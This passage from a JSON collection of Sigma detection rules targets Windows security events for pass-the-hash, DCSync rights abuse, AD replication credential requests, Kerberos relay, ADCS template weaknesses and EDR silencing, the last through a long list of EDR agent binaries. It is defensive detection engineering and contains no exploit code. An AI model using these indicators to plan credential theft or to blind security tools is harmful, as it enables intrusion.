    "content": "title: Pass the Hash Activity 2\nid: 8eef149c-bd26-49f2-9e5a-9b00e3af499b\nstatus: stable\ndescription: Detects the attack technique pass the hash which is used to move laterally inside the network\nreferences:\n    - https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events\n    - https://web.archive.org/web/20170909091934/https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis\n    - https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/\nauthor: Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)\ndate: 2019-06-14\nmodified: 2022-10-05\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.t1550.002\nlogsource:\n    product: windows\n    service: security\n    definition: The successful use of PtH for lateral movement between workstations would trigger event ID 4624\ndetection:\n    selection_logon3:\n        EventID: 4624\n        SubjectUserSid: 'S-1-0-0'\n        LogonType: 3\n        LogonProcessName: 'NtLmSsp'\n        KeyLength: 0\n    selection_logon9:\n        EventID: 4624\n        LogonType: 9\n        LogonProcessName: 'seclogo'\n    filter:\n        TargetUserName: 'ANONYMOUS LOGON'\n    condition: 1 of selection_* and not filter\nfalsepositives:\n    - Administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_rdp_localhost_login.yml",
    "content": "title: RDP Login from Localhost\nid: 51e33403-2a37-4d66-a574-1fda1782cc31\nstatus: test\ndescription: RDP login with localhost source address may be a tunnelled login\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html\nauthor: Thomas Patzke\ndate: 2019-01-28\nmodified: 2022-10-09\ntags:\n    - attack.lateral-movement\n    - car.2013-07-002\n    - attack.t1021.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 10\n        IpAddress:\n            - '::1'\n            - '127.0.0.1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml",
    "content": "title: A Security-Enabled Global Group Was Deleted\nid: b237c54b-0f15-4612-a819-44b735e0de27\nrelated:\n    - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e\n      type: obsolete\nstatus: stable\ndescription: Detects activity when a security-enabled global group is deleted\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634\nauthor: Alexandr Yampolskyi, SOC Prime\ndate: 2023-04-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4730 # A security-enabled global group was deleted\n            - 634 # Security Enabled Global Group Deleted\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml",
    "content": "title: External Remote RDP Logon from Public IP\nid: 259a9cdf-c4dd-4fa2-b243-2269e5ab18a2\nrelated:\n    - id: 78d5cab4-557e-454f-9fb9-a222bd0d5edc\n      type: derived\nstatus: test\ndescription: Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.\nreferences:\n    - https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html\n    - https://twitter.com/Purp1eW0lf/status/1616144561965002752\nauthor: Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)\ndate: 2023-01-19\nmodified: 2024-03-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1133\n    - attack.t1078\n    - attack.t1110\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 10\n    filter_main_local_ranges:\n        IpAddress|cidr:\n            - '::1/128'  # IPv6 loopback\n            - '10.0.0.0/8'\n            - '127.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - 'fc00::/7'  # IPv6 private addresses\n            - 'fe80::/10'  # IPv6 link-local addresses\n    filter_main_empty:\n        IpAddress: '-'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate or intentional inbound connections from public IP addresses on the RDP port.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml",
    "content": "title: External Remote SMB Logon from Public IP\nid: 78d5cab4-557e-454f-9fb9-a222bd0d5edc\nrelated:\n    - id: 259a9cdf-c4dd-4fa2-b243-2269e5ab18a2\n      type: derived\nstatus: test\ndescription: Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.\nreferences:\n    - https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html\n    - https://twitter.com/Purp1eW0lf/status/1616144561965002752\nauthor: Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)\ndate: 2023-01-19\nmodified: 2024-03-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1133\n    - attack.t1078\n    - attack.t1110\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 3\n    filter_main_local_ranges:\n        IpAddress|cidr:\n            - '::1/128'  # IPv6 loopback\n            - '10.0.0.0/8'\n            - '127.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - 'fc00::/7'  # IPv6 private addresses\n            - 'fe80::/10'  # IPv6 link-local addresses\n    filter_main_empty:\n        IpAddress: '-'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate or intentional inbound connections from public IP addresses on the SMB port.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_susp_failed_logon_source.yml",
    "content": "title: Failed Logon From Public IP\nid: f88e112a-21aa-44bd-9b01-6ee2a2bbbed1\nstatus: test\ndescription: Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625\nauthor: NVISO\ndate: 2020-05-06\nmodified: 2024-03-11\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.t1078\n    - attack.t1190\n    - attack.t1133\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4625\n    filter_main_ip_unknown:\n        IpAddress|contains: '-'\n    filter_main_local_ranges:\n        IpAddress|cidr:\n            - '::1/128'  # IPv6 loopback\n            - '10.0.0.0/8'\n            - '127.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - 'fc00::/7'  # IPv6 private addresses\n            - 'fe80::/10'  # IPv6 link-local addresses\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate logon attempts over the internet\n    - IPv4-to-IPv6 mapped IPs\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_susp_logon_newcredentials.yml",
    "content": "title: Outgoing Logon with New Credentials\nid: def8b624-e08f-4ae1-8612-1ba21190da6b\nstatus: test\ndescription: Detects logon events that specify new credentials\nreferences:\n    - https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf\nauthor: Max Altgelt (Nextron Systems)\ndate: 2022-04-06\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.t1550\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 9\n    condition: selection\nfalsepositives:\n    - Legitimate remote administration activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_susp_privesc_kerberos_relay_over_ldap.yml",
    "content": "title: Potential Privilege Escalation via Local Kerberos Relay over LDAP\nid: 749c9f5e-b353-4b90-a9c1-05243357ca4b\nstatus: test\ndescription: |\n    Detects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account.\n    This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.\nreferences:\n    - https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g\n    - https://github.com/elastic/detection-rules/blob/5fe7833312031a4787e07893e27e4ea7a7665745/rules/_deprecated/privilege_escalation_krbrelayup_suspicious_logon.toml#L38\nauthor: Elastic, @SBousseaden\ndate: 2022-04-27\nmodified: 2024-08-13\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.t1548\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 3\n        AuthenticationPackageName: 'Kerberos'\n        IpAddress: '127.0.0.1'\n        TargetUserSid|startswith: 'S-1-5-21-'\n        TargetUserSid|endswith: '-500'\n    filter_main_ip_null:\n        IpPort: '0'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_susp_rottenpotato.yml",
    "content": "title: RottenPotato Like Attack Pattern\nid: 16f5d8ca-44bd-47c8-acbe-6fc95a16c12f\nstatus: test\ndescription: Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like\nreferences:\n    - https://twitter.com/SBousseaden/status/1195284233729777665\nauthor: '@SBousseaden, Florian Roth'\ndate: 2019-11-15\nmodified: 2022-12-22\ntags:\n    - attack.collection\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.t1557.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 3\n        TargetUserName: 'ANONYMOUS LOGON'\n        WorkstationName: '-'\n        IpAddress:\n            - '127.0.0.1'\n            - '::1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_susp_wmi_login.yml",
    "content": "title: Successful Account Login Via WMI\nid: 5af54681-df95-4c26-854f-2565e13cfab0\nstatus: stable\ndescription: Detects successful logon attempts performed with WMI\nreferences:\n    - Internal Research\nauthor: Thomas Patzke\ndate: 2019-12-04\nmodified: 2024-01-17\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        ProcessName|endswith: '\\WmiPrvSE.exe'\n    condition: selection\nfalsepositives:\n    - Monitoring tools\n    - Legitimate system administration\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml",
    "content": "title: Windows Filtering Platform Blocked Connection From EDR Agent Binary\nid: bacf58c6-e199-4040-a94f-95dea0f1e45a\nstatus: test\ndescription: |\n    Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents.\n    Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events.\nreferences:\n    - https://github.com/netero1010/EDRSilencer\n    - https://github.com/amjcyber/EDRNoiseMaker\n    - https://ghoulsec.medium.com/misc-series-4-forensics-on-edrsilencer-events-428b20b3f983\nauthor: '@gott_cyber'\ndate: 2024-01-08\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Filtering Platform Connection needs to be enabled'\ndetection:\n    selection:\n        EventID: 5157\n        Application|endswith:\n            - '\\AmSvc.exe' # Cybereason\n            - '\\cb.exe' # Carbon Black EDR\n            - '\\CETASvc.exe' # TrendMicro Apex One\n            - '\\CNTAoSMgr.exe' # TrendMicro Apex One\n            - '\\CrAmTray.exe' # Cybereason\n            - '\\CrsSvc.exe' # Cybereason\n            - '\\CSFalconContainer.exe' # CrowdStrike Falcon\n            - '\\CSFalconService.exe' # CrowdStrike Falcon\n            - '\\CybereasonAV.exe' # Cybereason\n            - '\\CylanceSvc.exe' # Cylance\n            - '\\cyserver.exe' # Palo Alto Networks Traps/Cortex XDR\n            - '\\CyveraService.exe' # Palo Alto Networks Traps/Cortex XDR\n            - '\\CyvrFsFlt.exe' # Palo Alto Networks Traps/Cortex XDR\n            - '\\EIConnector.exe' # ESET Inspect\n            - '\\elastic-agent.exe' # Elastic EDR\n            - '\\elastic-endpoint.exe' # Elastic EDR\n            - '\\EndpointBasecamp.exe' # TrendMicro Apex One\n            - '\\ExecutionPreventionSvc.exe' # Cybereason\n            - '\\filebeat.exe' # Elastic EDR\n            - '\\fortiedr.exe' # FortiEDR\n            - '\\hmpalert.exe' # Sophos EDR\n            - '\\hurukai.exe' # Harfanglab EDR\n            - '\\LogProcessorService.exe' # SentinelOne\n            - '\\mcsagent.exe' # Sophos EDR\n            - '\\mcsclient.exe' # Sophos EDR\n            - '\\MsMpEng.exe' # Microsoft Defender for Endpoint and Microsoft Defender Antivirus\n            - '\\MsSense.exe' # Microsoft Defender for Endpoint and Microsoft Defender Antivirus\n            - '\\Ntrtscan.exe' # TrendMicro Apex One\n            - '\\PccNTMon.exe' # TrendMicro Apex One\n            - '\\QualysAgent.exe' # Qualys EDR\n            - '\\RepMgr.exe' # Carbon Black Cloud\n            - '\\RepUtils.exe' # Carbon Black Cloud\n            - '\\RepUx.exe' # Carbon Black Cloud\n            - '\\RepWAV.exe' # Carbon Black Cloud\n            - '\\RepWSC.exe' # Carbon Black Cloud\n            - '\\sedservice.exe' # Sophos EDR\n            - '\\SenseCncProxy.exe' # Microsoft Defender for Endpoint and Microsoft Defender Antivirus\n            - '\\SenseIR.exe' # Microsoft Defender for Endpoint and Microsoft Defender Antivirus\n            - '\\SenseNdr.exe' # Microsoft Defender for Endpoint and Microsoft Defender Antivirus\n            - '\\SenseSampleUploader.exe' # Microsoft Defender for Endpoint and Microsoft Defender Antivirus\n            - '\\SentinelAgent.exe' # SentinelOne\n            - '\\SentinelAgentWorker.exe' # SentinelOne\n            - '\\SentinelBrowserNativeHost.exe' # SentinelOne\n            - '\\SentinelHelperService.exe' # SentinelOne\n            - '\\SentinelServiceHost.exe' # SentinelOne\n            - '\\SentinelStaticEngine.exe' # SentinelOne\n            - '\\SentinelStaticEngineScanner.exe' # SentinelOne\n            - '\\sfc.exe' # Cisco Secure Endpoint (Formerly Cisco AMP)\n            - '\\sophos ui.exe' # Sophos EDR\n            - '\\sophosfilescanner.exe' # Sophos EDR\n            - '\\sophosfs.exe' # Sophos EDR\n            - '\\sophoshealth.exe' # Sophos EDR\n            - '\\sophosips.exe' # Sophos EDR\n            - '\\sophosLivequeryservice.exe' # Sophos EDR\n            - '\\sophosnetfilter.exe' # Sophos EDR\n            - '\\sophosntpservice.exe' # Sophos EDR\n            - '\\sophososquery.exe' # Sophos EDR\n            - '\\sspservice.exe' # Sophos EDR\n            - '\\TaniumClient.exe' # Tanium\n            - '\\TaniumCX.exe' # Tanium\n            - '\\TaniumDetectEngine.exe' # Tanium\n            - '\\TMBMSRV.exe' # TrendMicro Apex One\n            - '\\TmCCSF.exe' # TrendMicro Apex One\n            - '\\TmListen.exe' # TrendMicro Apex One\n            - '\\TmWSCSvc.exe' # TrendMicro Apex One\n            - '\\Traps.exe' # Palo Alto Networks Traps/Cortex XDR\n            - '\\winlogbeat.exe' # Elastic EDR\n            - '\\WSCommunicator.exe' # TrendMicro Apex One\n            - '\\xagt.exe' # Trellix EDR\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml",
    "content": "title: Azure AD Health Monitoring Agent Registry Keys Access\nid: ff151c33-45fa-475d-af4f-c2f93571f4fe\nstatus: test\ndescription: |\n    This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\n    This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\nreferences:\n    - https://o365blog.com/post/hybridhealthagent/\n    - https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-08-26\nmodified: 2022-10-09\ntags:\n    - attack.discovery\n    - attack.t1012\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4656\n            - 4663\n        ObjectType: 'Key'\n        ObjectName: '\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent'\n    filter:\n        ProcessName|contains:\n            - 'Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe'\n            - 'Microsoft.Identity.Health.Adfs.InsightsService.exe'\n            - 'Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe'\n            - 'Microsoft.Identity.Health.Adfs.PshSurrogate.exe'\n            - 'Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml",
    "content": "title: Azure AD Health Service Agents Registry Keys Access\nid: 1d2ab8ac-1a01-423b-9c39-001510eae8e8\nstatus: test\ndescription: |\n    This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\n    Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\n    This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\n    Make sure you set the SACL to propagate to its sub-keys.\nreferences:\n    - https://o365blog.com/post/hybridhealthagent/\n    - https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-08-26\nmodified: 2022-10-09\ntags:\n    - attack.discovery\n    - attack.t1012\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4656\n            - 4663\n        ObjectType: 'Key'\n        ObjectName: '\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\ADHealthAgent'\n    filter:\n        ProcessName|contains:\n            - 'Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe'\n            - 'Microsoft.Identity.Health.Adfs.InsightsService.exe'\n            - 'Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe'\n            - 'Microsoft.Identity.Health.Adfs.PshSurrogate.exe'\n            - 'Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml",
    "content": "title: Powerview Add-DomainObjectAcl DCSync AD Extend Right\nid: 2c99737c-585d-4431-b61a-c911d86ff32f\nstatus: test\ndescription: Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer\nreferences:\n    - https://twitter.com/menasec1/status/1111556090137903104\n    - https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf\nauthor: Samir Bousseaden, Roberto Rodriguez @Cyb3rWard0g, oscd.community, Tim Shelton, Maxence Fossat\ndate: 2019-04-03\nmodified: 2022-08-16\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: The \"Audit Directory Service Changes\" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs). Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule need to be setup (See https://github.com/OTRF/Set-AuditRule)'\ndetection:\n    selection:\n        EventID: 5136\n        AttributeLDAPDisplayName: 'ntSecurityDescriptor'\n        AttributeValue|contains:\n            - '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'\n            - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'\n            - '89e95b76-444d-4c62-991a-0facbeda640c'\n    filter_main_dns_object_class:\n        ObjectClass:\n            - 'dnsNode'\n            - 'dnsZoneScope'\n            - 'dnsZone'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_account_discovery.yml",
    "content": "title: AD Privileged Users or Groups Reconnaissance\nid: 35ba1d85-724d-42a3-889f-2e2362bcaf23\nstatus: test\ndescription: Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs\nreferences:\n    - https://web.archive.org/web/20230329163438/https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html\nauthor: Samir Bousseaden\ndate: 2019-04-03\nmodified: 2022-07-13\ntags:\n    - attack.discovery\n    - attack.t1087.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: enable Object Access SAM on your Domain Controllers'\ndetection:\n    selection:\n        EventID: 4661\n        ObjectType:\n            - 'SAM_USER'\n            - 'SAM_GROUP'\n    selection_object:\n        - ObjectName|endswith:\n              - '-512'\n              - '-502'\n              - '-500'\n              - '-505'\n              - '-519'\n              - '-520'\n              - '-544'\n              - '-551'\n              - '-555'\n        - ObjectName|contains: 'admin'\n    filter:\n        SubjectUserName|endswith: '$'\n    condition: selection and selection_object and not filter\nfalsepositives:\n    - If source account name is not an admin then its super suspicious\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_ad_object_writedac_access.yml",
    "content": "title: AD Object WriteDAC Access\nid: 028c7842-4243-41cd-be6f-12f3cf1a26c7\nstatus: test\ndescription: Detects WRITE_DAC access to a domain object\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html\n    - https://threathunterplaybook.com/library/windows/active_directory_replication.html\n    - https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-09-12\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1222.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4662\n        ObjectServer: 'DS'\n        AccessMask: '0x40000'\n        ObjectType:\n            - '19195a5b-6da0-11d0-afd3-00c04fd930c9'\n            - 'domainDNS'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml",
    "content": "title: Active Directory Replication from Non Machine Account\nid: 17d619c1-e020-4347-957e-1d1207455c93\nstatus: test\ndescription: Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html\n    - https://threathunterplaybook.com/library/windows/active_directory_replication.html\n    - https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-07-26\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1003.006\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4662\n        AccessMask: '0x100'\n        Properties|contains:\n            - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'\n            - '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'\n            - '89e95b76-444d-4c62-991a-0facbeda640c'\n    filter:\n        - SubjectUserName|endswith: '$'\n        - SubjectUserName|startswith: 'MSOL_' # https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/reference-connect-accounts-permissions#ad-ds-connector-account\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_ad_user_enumeration.yml",
    "content": "title: Potential AD User Enumeration From Non-Machine Account\nid: ab6bffca-beff-4baa-af11-6733f296d57a\nstatus: test\ndescription: Detects read access to a domain user from a non-machine account\nreferences:\n    - https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf\n    - http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html\n    - https://learn.microsoft.com/en-us/windows/win32/adschema/attributes-all # For further investigation of the accessed properties\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662\nauthor: Maxime Thiebaut (@0xThiebaut)\ndate: 2020-03-30\nmodified: 2022-11-08\ntags:\n    - attack.discovery\n    - attack.t1087.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: The \"Read all properties\" permission on the user object needs to be audited for the \"Everyone\" principal'\ndetection:\n    selection:\n        EventID: 4662\n        # Using contains as the data commonly is structured as \"%{bf967aba-0de6-11d0-a285-00aa003049e2}\"\n        # The user class (https://learn.microsoft.com/en-us/windows/win32/adschema/c-user)\n        ObjectType|contains: 'bf967aba-0de6-11d0-a285-00aa003049e2'\n        AccessMask|endswith:\n            # Note: Since the Access Mask can have more than once permission we need to add all permutations that include the READ property\n            - '1?' # This covers all access masks that are 1 bytes or shorter and the \"Read Property\" itself\n            - '3?' # Read Property + Write Property\n            - '4?' # Read Property + Delete Tree\n            - '7?' # Read Property + Write Property + Delete Tree\n            - '9?' # Read Property + List Object\n            - 'B?' # Read Property + Write Property + List Object\n            - 'D?' # Read Property + Delete Tree + List Object\n            - 'F?' # Covers usage of all possible 2 bytes permissions with any or none of the single byte permissions\n    filter_main_machine_accounts:\n        SubjectUserName|endswith: '$' # Exclude machine accounts\n    filter_main_msql:\n        SubjectUserName|startswith: 'MSOL_' # https://learn.microsoft.com/en-us/azure/active-directory/hybrid/reference-connect-accounts-permissions#ad-ds-connector-account\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrators configuring new users.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml",
    "content": "title: ADCS Certificate Template Configuration Vulnerability\nid: 5ee3a654-372f-11ec-8d3d-0242ac130003\nstatus: test\ndescription: Detects certificate creation with template allowing risk permission subject\nreferences:\n    - https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf\nauthor: Orlinum , BlueDefenZer\ndate: 2021-11-17\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.credential-access\nlogsource:\n    product: windows\n    service: security\n    definition: Certificate services loaded a template would trigger event ID 4898 and certificate Services template was updated would trigger event ID 4899. A risk permission seems to be coming if template contain specific flag.\ndetection:\n    selection1:\n        EventID: 4898\n        TemplateContent|contains: 'CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT'\n    selection2:\n        EventID: 4899\n        NewTemplateContent|contains: 'CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT'\n    condition: selection1 or selection2\nfalsepositives:\n    - Administrator activity\n    - Proxy SSL certificate with subject modification\n    - Smart card enrollement\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml",
    "content": "title: ADCS Certificate Template Configuration Vulnerability with Risky EKU\nid: bfbd3291-de87-4b7c-88a2-d6a5deb28668\nstatus: test\ndescription: Detects certificate creation with template allowing risk permission subject and risky EKU\nreferences:\n    - https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf\nauthor: Orlinum , BlueDefenZer\ndate: 2021-11-17\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.credential-access\nlogsource:\n    product: windows\n    service: security\n    definition: Certificate services loaded a template would trigger event ID 4898 and certificate Services template was updated would trigger event ID 4899. A risk permission seems to be coming if template contain specific flag with risky EKU.\ndetection:\n    selection10:\n        EventID: 4898\n        TemplateContent|contains:\n            - '1.3.6.1.5.5.7.3.2'\n            - '1.3.6.1.5.2.3.4'\n            - '1.3.6.1.4.1.311.20.2.2'\n            - '2.5.29.37.0'\n    selection11:\n        TemplateContent|contains: 'CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT'\n\n    selection20:\n        EventID: 4899\n        NewTemplateContent|contains:\n            - '1.3.6.1.5.5.7.3.2'\n            - '1.3.6.1.5.2.3.4'\n            - '1.3.6.1.4.1.311.20.2.2'\n            - '2.5.29.37.0'\n    selection21:\n        NewTemplateContent|contains: 'CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT'\n\n    condition: (selection10 and selection11) or (selection20 and selection21)\nfalsepositives:\n    - Administrator activity\n    - Proxy SSL certificate with subject modification\n    - Smart card enrollement\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_add_remove_computer.yml",
